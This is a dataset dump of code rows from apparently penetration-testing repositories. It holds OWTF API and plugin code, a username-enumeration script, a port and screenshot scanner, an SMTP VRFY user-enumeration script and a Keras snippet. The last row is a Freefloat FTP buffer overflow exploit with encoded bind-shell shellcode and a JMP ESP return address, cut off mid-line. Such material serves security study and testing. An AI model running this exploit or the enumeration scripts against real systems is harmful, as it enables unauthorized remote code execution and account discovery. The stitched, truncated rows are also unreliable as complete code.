plugin_group=None, plugin_type=None, plugin_code=None):\n \"\"\"Delete a plugin output.\n\n **Example request**:\n\n .. sourcecode:: http\n\n DELETE /api/v1/targets/2/poutput/web/external/OWTF-AJ-001 HTTP/1.1\n X-Requested-With: XMLHttpRequest\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n {\n \"status\": \"success\",\n \"data\": null\n }\n \"\"\"\n try:\n filter_data = dict(self.request.arguments)\n if not plugin_group: # First check if plugin_group is present in url\n delete_all_poutput(self.session, filter_data, target_id=int(target_id))\n if plugin_group and (not plugin_type):\n filter_data.update({\"plugin_group\": plugin_group})\n delete_all_poutput(self.session, filter_data, target_id=int(target_id))\n if plugin_type and plugin_group and (not plugin_code):\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in the selected plugin group\")\n filter_data.update({\"plugin_type\": plugin_type, \"plugin_group\": plugin_group})\n delete_all_poutput(self.session, filter_data, target_id=int(target_id))\n if plugin_type and plugin_group and plugin_code:\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in the selected plugin group\")\n filter_data.update(\n {\"plugin_type\": plugin_type, \"plugin_group\": plugin_group, \"plugin_code\": plugin_code}\n )\n delete_all_poutput(self.session, filter_data, target_id=int(target_id))\n self.success(None)\n except exceptions.InvalidTargetReference:\n raise APIError(400, \"Invalid target reference provided\")\n except exceptions.InvalidParameterType:\n raise APIError(400, \"Invalid parameter type provided\")\n"},"avg_line_length":{"kind":"number","value":40.126315789473686,"string":"40.126316"},"max_line_length":{"kind":"number","value":117,"string":"117"},"alphnanum_fraction":{"kind":"number","value":0.4919050361553721,"string":"0.491905"}}},{"rowIdx":161,"cells":{"repo_name":{"kind":"string","value":"Python-Penetration-Testing-for-Developers"},"text":{"kind":"string","value":"#basic username check\nimport sys\nimport urllib\nimport urllib2\n\nif len(sys.argv) !=2:\n print \"usage: %s username\" % (sys.argv[0])\n sys.exit(0)\n\nurl = \"http://www.vulnerablesite.com/forgotpassword.html\"\nusername = str(sys.argv[1])\ndata = urllib.urlencode({\"username\":username})\nresponse = urllib2.urlopen(url,data).read()\nUnknownStr=\"Username not found\"\nif(response.find(UnknownStr)<0):\n\tprint \"Username exists!\"\n"},"avg_line_length":{"kind":"number","value":23.58823529411765,"string":"23.588235"},"max_line_length":{"kind":"number","value":57,"string":"57"},"alphnanum_fraction":{"kind":"number","value":0.7242206235011991,"string":"0.724221"}}},{"rowIdx":162,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"import screenshot\r\nimport requests\r\n\r\nportList = [80,443,2082,2083,2086,2087,2095,2096,8080,8880,8443,9998,4643,9001,4489]\r\n\r\nIP = '127.0.0.1'\r\n\r\nhttp = 'http://'\r\nhttps = 'https://'\r\n\r\ndef testAndSave(protocol, portNumber):\r\n url = protocol + IP + ':' + str(portNumber)\r\n try:\r\n r = requests.get(url,timeout=1)\r\n \r\n if r.status_code == 200:\r\n print 'Found site on ' + url \r\n s = screenshot.Screenshot()\r\n image = s.get_image(url)\r\n image.save(str(portNumber) + '.png')\r\n except:\r\n pass\r\n\r\nfor port in portList:\r\n testAndSave(http, port)\r\n testAndSave(https, port)\r\n"},"avg_line_length":{"kind":"number","value":23.22222222222222,"string":"23.222222"},"max_line_length":{"kind":"number","value":85,"string":"85"},"alphnanum_fraction":{"kind":"number","value":0.5650842266462481,"string":"0.565084"}}},{"rowIdx":163,"cells":{"repo_name":{"kind":"string","value":"PenetrationTestingScripts"},"text":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-09 05:40\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('nmaper', '0011_auto_20160108_0702'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='nmapscan',\n name='slug',\n ),\n migrations.AddField(\n model_name='nmapscan',\n name='uuid',\n field=models.CharField(default='', max_length=128),\n preserve_default=False,\n ),\n ]\n"},"avg_line_length":{"kind":"number","value":22.076923076923077,"string":"22.076923"},"max_line_length":{"kind":"number","value":63,"string":"63"},"alphnanum_fraction":{"kind":"number","value":0.5642737896494157,"string":"0.564274"}}},{"rowIdx":164,"cells":{"repo_name":{"kind":"string","value":"Mastering-Machine-Learning-for-Penetration-Testing"},"text":{"kind":"string","value":"import numpy\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend\nbackend.set_image_dim_ordering('th')\nmodel = Sequential()\nmodel.add(Conv2D(32, (5, 5), input_shape=(1, 28, 28),\nactivation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam',metrics=['accuracy'])\n"},"avg_line_length":{"kind":"number","value":34,"string":"34"},"max_line_length":{"kind":"number","value":85,"string":"85"},"alphnanum_fraction":{"kind":"number","value":0.784741144414169,"string":"0.784741"}}},{"rowIdx":165,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"from owtf.managers.resource import get_resources\nfrom owtf.plugin.helper import plugin_helper\n\nDESCRIPTION = \"Plugin to assist manual testing\"\n\n\ndef run(PluginInfo):\n resource = get_resources(\"ExternalFileExtHandling\")\n Content = plugin_helper.resource_linklist(\"Online Resources\", resource)\n return Content\n"},"avg_line_length":{"kind":"number","value":27.90909090909091,"string":"27.909091"},"max_line_length":{"kind":"number","value":75,"string":"75"},"alphnanum_fraction":{"kind":"number","value":0.7823343848580442,"string":"0.782334"}}},{"rowIdx":166,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"from owtf.managers.resource import get_resources\nfrom owtf.plugin.helper import plugin_helper\n\nDESCRIPTION = \"Cross Site Flashing Plugin to assist manual testing\"\n\n\ndef run(PluginInfo):\n resource = get_resources(\"ExternalCrossSiteFlashing\")\n Content = plugin_helper.resource_linklist(\"Online Resources\", resource)\n return Content\n"},"avg_line_length":{"kind":"number","value":29.90909090909091,"string":"29.909091"},"max_line_length":{"kind":"number","value":75,"string":"75"},"alphnanum_fraction":{"kind":"number","value":0.7876106194690266,"string":"0.787611"}}},{"rowIdx":167,"cells":{"repo_name":{"kind":"string","value":"Python-Penetration-Testing-for-Developers"},"text":{"kind":"string","value":"import sys\n\nf = open(\"ciphers.txt\", \"r\")\n\nMSGS = f.readlines()\n\ndef strxor(a, b): # xor two strings of different lengths\n if len(a) > len(b):\n return \"\".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a[:len(b)], b)])\n else:\n return \"\".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a, b[:len(a)])])\n\ndef encrypt(key, msg):\n c = strxor(key, msg)\n return c\n\nkey = \"315c4eeaa8b5f8aaf9174145bf43e1784b8fa00dc71d885a804e5ee9fa40b16349c146fb778cdf2d3aff021dfff5b403b510d0d0455468aeb98622b137dae857553ccd8883a7bc37520e06e515d22c954eba5025b8cc57ee59418ce7dc6bc41556bdb36bbca3e8774301fbcaa3b83b220809560987815f65286764\".decode(\"hex\")\nk3y = \"32510ba9babebbbefd001547a810e67149caee11d945cd7fc81a05e9f85aac650e9052ba6a8cd8257bf14d13e6f0a803b54fde9e77472dbff89d71b57bddef121336cb85ccb8f3315f4b52e301d16e9f52f904\".decode(\"hex\")\nmsg = \"We can factor the number 15 with quantum computers. We can also factor the number 15 with a dog trained to bark three times\"\nciphertexts = encrypt(msg, key)\nanswer = encrypt(ciphertexts, k3y)\nprint answer\nprint answer.encode(\"hex\")"},"avg_line_length":{"kind":"number","value":45.91304347826087,"string":"45.913043"},"max_line_length":{"kind":"number","value":268,"string":"268"},"alphnanum_fraction":{"kind":"number","value":0.7653061224489796,"string":"0.765306"}}},{"rowIdx":168,"cells":{"repo_name":{"kind":"string","value":"Penetration-Testing-Study-Notes"},"text":{"kind":"string","value":"#!/usr/bin/python\nimport socket\nimport sys\nimport subprocess\n\nif len(sys.argv) != 2:\n print \"Usage: smtprecon.py \"\n sys.exit(0)\n\n#SMTPSCAN = \"nmap -vv -sV -Pn -p 25,465,587 --script=smtp-vuln* %s\" % (sys.argv[1])\n#results = subprocess.check_output(SMTPSCAN, shell=True)\n\n#f = open(\"results/smtpnmapresults.txt\", \"a\")\n#f.write(results)\n#f.close\n\n\nprint \"INFO: Trying SMTP Enum on \" + sys.argv[1]\nnames = open('/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/namelist.txt', 'r')\nfor name in names:\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connect=s.connect((sys.argv[1],25))\n banner=s.recv(1024)\n s.send('HELO test@test.org \\r\\n')\n result= s.recv(1024)\n s.send('VRFY ' + name.strip() + '\\r\\n')\n result=s.recv(1024)\n if (\"not implemented\" in result) or (\"disallowed\" in result):\n\tsys.exit(\"INFO: VRFY Command not implemented on \" + sys.argv[1]) \n if ((\"250\" in result) or (\"252\" in result) and (\"Cannot VRFY\" not in result)):\n\tprint \"[*] SMTP VRFY Account found on \" + sys.argv[1] + \": \" + name.strip()\t\n s.close()\n\n"},"avg_line_length":{"kind":"number","value":31,"string":"31"},"max_line_length":{"kind":"number","value":94,"string":"94"},"alphnanum_fraction":{"kind":"number","value":0.6504139834406624,"string":"0.650414"}}},{"rowIdx":169,"cells":{"repo_name":{"kind":"string","value":"Python-Penetration-Testing-for-Developers"},"text":{"kind":"string","value":"import socket\nhost = \"192.168.0.1\"\nport = 12346\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind((host,port))\ns.settimeout(5)\ndata, addr = s.recvfrom(1024)\nprint \"recevied from \",addr\nprint \"obtained \", data\ns.close()"},"avg_line_length":{"kind":"number","value":21.9,"string":"21.9"},"max_line_length":{"kind":"number","value":52,"string":"52"},"alphnanum_fraction":{"kind":"number","value":0.7149122807017544,"string":"0.714912"}}},{"rowIdx":170,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"#!/usr/bin/Python\n#Title: Freefloat FTP 1.0 Non Implemented Command Buffer Overflows\n#Author: Craig Freyman (@cd1zz)\n#Date: July 19, 2011\n#Tested on Windows XP SP3 English\n#Part of FreeFloat pwn week\n#Vendor Notified: 7-18-2011 (no response)\n#Software Link: http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php\n\nimport socket,sys,time,struct\n\nif len(sys.argv) < 2:\n print \"[-]Usage: %s \" % sys.argv[0] + \"\\r\"\n print \"[-]For example [filename.py 192.168.1.10 PWND] would do the trick.\"\n print \"[-]Other options: AUTH, APPE, ALLO, ACCT\"\n sys.exit(0)\n\ntarget = sys.argv[1]\ncommand = sys.argv[2]\n\nif len(sys.argv) > 2:\n platform = sys.argv[2]\n\n#./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b \"\\x00\\xff\\x0d\\x0a\\x3d\\x20\"\n#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)\n\nshellcode = (\"\\xbf\\x5c\\x2a\\x11\\xb3\\xd9\\xe5\\xd9\\x74\\x24\\xf4\\x5d\\x33\\xc9\" \n\"\\xb1\\x56\\x83\\xc5\\x04\\x31\\x7d\\x0f\\x03\\x7d\\x53\\xc8\\xe4\\x4f\" \n\"\\x83\\x85\\x07\\xb0\\x53\\xf6\\x8e\\x55\\x62\\x24\\xf4\\x1e\\xd6\\xf8\" \n\"\\x7e\\x72\\xda\\x73\\xd2\\x67\\x69\\xf1\\xfb\\x88\\xda\\xbc\\xdd\\xa7\" \n\"\\xdb\\x70\\xe2\\x64\\x1f\\x12\\x9e\\x76\\x73\\xf4\\x9f\\xb8\\x86\\xf5\" \n\"\\xd8\\xa5\\x68\\xa7\\xb1\\xa2\\xda\\x58\\xb5\\xf7\\xe6\\x59\\x19\\x7c\" \n\"\\x56\\x22\\x1c\\x43\\x22\\x98\\x1f\\x94\\x9a\\x97\\x68\\x0c\\x91\\xf0\" \n\"\\x48\\x2d\\x76\\xe3\\xb5\\x64\\xf3\\xd0\\x4e\\x77\\xd5\\x28\\xae\\x49\" \n\"\\x19\\xe6\\x91\\x65\\x94\\xf6\\xd6\\x42\\x46\\x8d\\x2c\\xb1\\xfb\\x96\" \n\"\\xf6\\xcb\\x27\\x12\\xeb\\x6c\\xac\\x84\\xcf\\x8d\\x61\\x52\\x9b\\x82\" \n\"\\xce\\x10\\xc3\\x86\\xd1\\xf5\\x7f\\xb2\\x5a\\xf8\\xaf\\x32\\x18\\xdf\" \n\"\\x6b\\x1e\\xfb\\x7e\\x2d\\xfa\\xaa\\x7f\\x2d\\xa2\\x13\\xda\\x25\\x41\" \n\"\\x40\\x5c\\x64\\x0e\\xa5\\x53\\x97\\xce\\xa1\\xe4\\xe4\\xfc\\x6e\\x5f\" \n\"\\x63\\x4d\\xe7\\x79\\x74\\xb2\\xd2\\x3e\\xea\\x4d\\xdc\\x3e\\x22\\x8a\" \n\"\\x88\\x6e\\x5c\\x3b\\xb0\\xe4\\x9c\\xc4\\x65\\xaa\\xcc\\x6a\\xd5\\x0b\" \n\"\\xbd\\xca\\x85\\xe3\\xd7\\xc4\\xfa\\x14\\xd8\\x0e\\x8d\\x12\\x16\\x6a\" \n\"\\xde\\xf4\\x5b\\x8c\\xf1\\x58\\xd5\\x6a\\x9b\\x70\\xb3\\x25\\x33\\xb3\" \n\"\\xe0\\xfd\\xa4\\xcc\\xc2\\x51\\x7d\\x5b\\x5a\\xbc\\xb9\\x64\\x5b\\xea\" \n\"\\xea\\xc9\\xf3\\x7d\\x78\\x02\\xc0\\x9c\\x7f\\x0f\\x60\\xd6\\xb8\\xd8\" \n\"\\xfa\\x86\\x0b\\x78\\xfa\\x82\\xfb\\x19\\x69\\x49\\xfb\\x54\\x92\\xc6\" \n\"\\xac\\x31\\x64\\x1f\\x38\\xac\\xdf\\x89\\x5e\\x2d\\xb9\\xf2\\xda\\xea\" \n\"\\x7a\\xfc\\xe3\\x7f\\xc6\\xda\\xf3\\xb9\\xc7\\x66\\xa7\\x15\\x9e\\x30\" \n\"\\x11\\xd0\\x48\\xf3\\xcb\\x8a\\x27\\x5d\\x9b\\x4b\\x04\\x5e\\xdd\\x53\" \n\"\\x41\\x28\\x01\\xe5\\x3c\\x6d\\x3e\\xca\\xa8\\x79\\x47\\x36\\x49\\x85\" \n\"\\x92\\xf2\\x79\\xcc\\xbe\\x53\\x12\\x89\\x2b\\xe6\\x7f\\x2a\\x86\\x25\" \n\"\\x86\\xa9\\x22\\xd6\\x7d\\xb1\\x47\\xd3\\x3a\\x75\\xb4\\xa9\\x53\\x10\" \n\"\\xba\\x1e\\x53\\x31\")\n\n#7C874413 FFE4 JMP ESP kernel32.dll\nret = struct.pack('